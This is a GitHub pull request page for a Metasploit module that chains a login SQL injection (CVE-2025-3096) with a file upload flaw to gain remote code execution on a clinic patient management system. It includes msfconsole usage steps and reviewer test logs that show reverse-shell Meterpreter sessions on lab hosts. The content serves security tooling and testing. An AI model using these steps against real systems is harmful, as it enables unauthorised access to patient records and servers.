Skip to content

Clinic Patient's Management System SQLi (CVE-2025-3096) #20177

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Merged
merged 9 commits into from
May 21, 2025
Merged

Clinic Patient's Management System SQLi (CVE-2025-3096) #20177

merged 9 commits into from
May 21, 2025

Conversation

msutovsky-r7
Copy link
Contributor

Vulnerable Application

Clinic Patient's Management System contains SQL injection vulnerability in login section. This module uses the vulnerability (CVE-2025-3096) to gain unauthorized access to the application. As lateral movement, it uses another vulnerability (CVE-2022-2297) to gain remote code execution.

Verification Steps

Vulnerable Application Installation Setup

  1. Install Clinic's Patient Management System on your web server.

    • Download the Web Application from here

  2. Start msfconsole and load the exploit module:

   msfconsole
   use exploit/multi/http/clinic_pms_sqli_to_rce
  1. Set the required options:
   set rport <port>
   set rhost <ip>
   set targeturi /pms
  1. Check if the target is vulnerable:
   check

If the target is vulnerable, you will see a message indicating that the target is susceptible to the exploit:

   [+] <IP> The target is vulnerable.
  1. Set up the listener for the exploit:
   set lport <port>
   set lhost <ip>
  1. Launch the exploit:
   exploit
  1. If successful, you will receive a PHP Meterpreter shell.

Options

  • TARGETURI: (Required) The base path to the Clinic Patient Management System (default: /pms).

Scenarios

msf6 exploit(multi/http/clinic_pms_sqli_to_rce) > exploit
[*] Started reverse TCP handler on 192.168.168.128:4444
[*] Logged using SQL injection..
[*] Malicious file uploaded..
[*] Logged out..
[*] Logged using SQL injection..
[*] Sending stage (40004 bytes) to 192.168.168.146
[*] Meterpreter session 1 opened (192.168.168.128:4444 -> 192.168.168.146:52522) at 2025-05-13 13:33:52 +0200

meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 6.8.0-52-generic #53~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Jan 15 19:18:46 UTC 2 x86_64
Meterpreter : php/linux

@msutovsky-r7 msutovsky-r7 changed the title Clinic Patient's Management System RCE (CVE-2025-3096) Clinic Patient's Management System SQLi (CVE-2025-3096) May 14, 2025
@jvoisin
Copy link
Contributor

jvoisin commented May 14, 2025

Is this software used/deployed in the real world™?

@msutovsky-r7
Copy link
Contributor Author

Is this software used/deployed in the real world™?

I don't think so, there's no results on Shodan. But there seems to be some "user" activity at source site.

sjanusz-r7
sjanusz-r7 reviewed May 15, 2025
View reviewed changes
@jheysel-r7 jheysel-r7 self-assigned this May 16, 2025
jheysel-r7
jheysel-r7 reviewed May 16, 2025
View reviewed changes
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Great module @msutovsky-r7! A couple minor comments.

Testing

msf6 exploit(multi/http/clinic_pms_sqli_to_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Logged using SQL injection..
[*] Malicious file uploaded..
[*] Logged out..
[*] Logged using SQL injection..
[*] Reporting vulnerability
[*] Sending stage (40004 bytes) to 172.16.199.134
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.134:36072) at 

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : msfuser-virtual-machine
OS          : Linux msfuser-virtual-machine 6.8.0-59-generic #61~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 15 17:03:15 UTC 2 x86_64
Meterpreter : php/linux
meterpreter >

jheysel-r7
jheysel-r7 reviewed May 21, 2025
View reviewed changes
jheysel-r7
jheysel-r7 approved these changes May 21, 2025
View reviewed changes
Copy link
Contributor

@jheysel-r7 jheysel-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for making all those changes @msutovsky-r7! Working as expected 👍

msf6 exploit(multi/http/clinic_pms_sqli_to_rce) > set targeturi /clinic-pms/pms/
targeturi => /clinic-pms/pms/
msf6 exploit(multi/http/clinic_pms_sqli_to_rce) > set rhost 172.16.199.134
rhost => 172.16.199.134
msf6 exploit(multi/http/clinic_pms_sqli_to_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/clinic_pms_sqli_to_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if target is vulnerable...
[+] The target appears to be vulnerable. Clinic PMS detected
[*] Logged using SQL injection..
[*] Malicious file uploaded..
[*] Logged out..
[*] Logged using SQL injection..
[*] Reporting vulnerability
[*] Sending stage (40004 bytes) to 172.16.199.134
[+] Deleted 1747841934yfqXXZYq.php
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.134:35942) at 2025-05-21 08:38:55 -0700

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : msfuser-virtual-machine
OS          : Linux msfuser-virtual-machine 6.8.0-59-generic #61~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 15 17:03:15 UTC 2 x86_64
Meterpreter : php/linux
meterpreter >

@github-project-automation github-project-automation bot moved this from Todo to In Progress in Metasploit Kanban May 21, 2025
@jheysel-r7 jheysel-r7 merged commit 0600de2 into rapid7:master May 21, 2025
18 checks passed
@github-project-automation github-project-automation bot moved this from In Progress to Done in Metasploit Kanban May 21, 2025
@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label May 21, 2025
@jheysel-r7
Copy link
Contributor

Release Notes

Clinic Patient's Management System contains SQL injection vulnerability in login section. This module uses the vulnerability (CVE-2025-3096) to gain unauthorized access to the application. As lateral movement, it uses another vulnerability (CVE-2022-2297) to gain remote code execution.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@sjanusz-r7 sjanusz-r7 sjanusz-r7 left review comments

@jheysel-r7 jheysel-r7 jheysel-r7 approved these changes

Assignees

@jheysel-r7 jheysel-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
4 participants
@msutovsky-r7 @jvoisin @jheysel-r7 @sjanusz-r7